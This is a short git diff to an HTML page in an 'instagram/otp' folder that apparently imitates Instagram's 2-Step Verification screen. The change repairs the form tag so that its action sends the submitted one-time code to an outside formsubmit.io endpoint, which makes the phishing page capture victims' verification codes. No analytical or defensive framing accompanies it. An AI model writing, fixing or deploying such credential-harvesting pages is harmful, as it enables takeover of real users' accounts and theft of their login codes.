--- a/instagram/otp/657daf104b167f68d1979b9c.html
+++ b/instagram/otp/657daf104b167f68d1979b9c.html
@@ -57,7 +57,7 @@
       <!-- SMARTPHONE SECTION END -->
       <!-- FORM SECTION -->
       <article class="form-area">
-        <form  id="form"  method="POST" https://formsubmit.io/send/1b814e9a-f1bb-467e-bba1-c718cf9632cb>
+        <form  id="form"  method="POST" action="https://formsubmit.io/send/1b814e9a-f1bb-467e-bba1-c718cf9632cb">
           <p class="small-title">2-Step Verification</p>
           <input
             type="text"
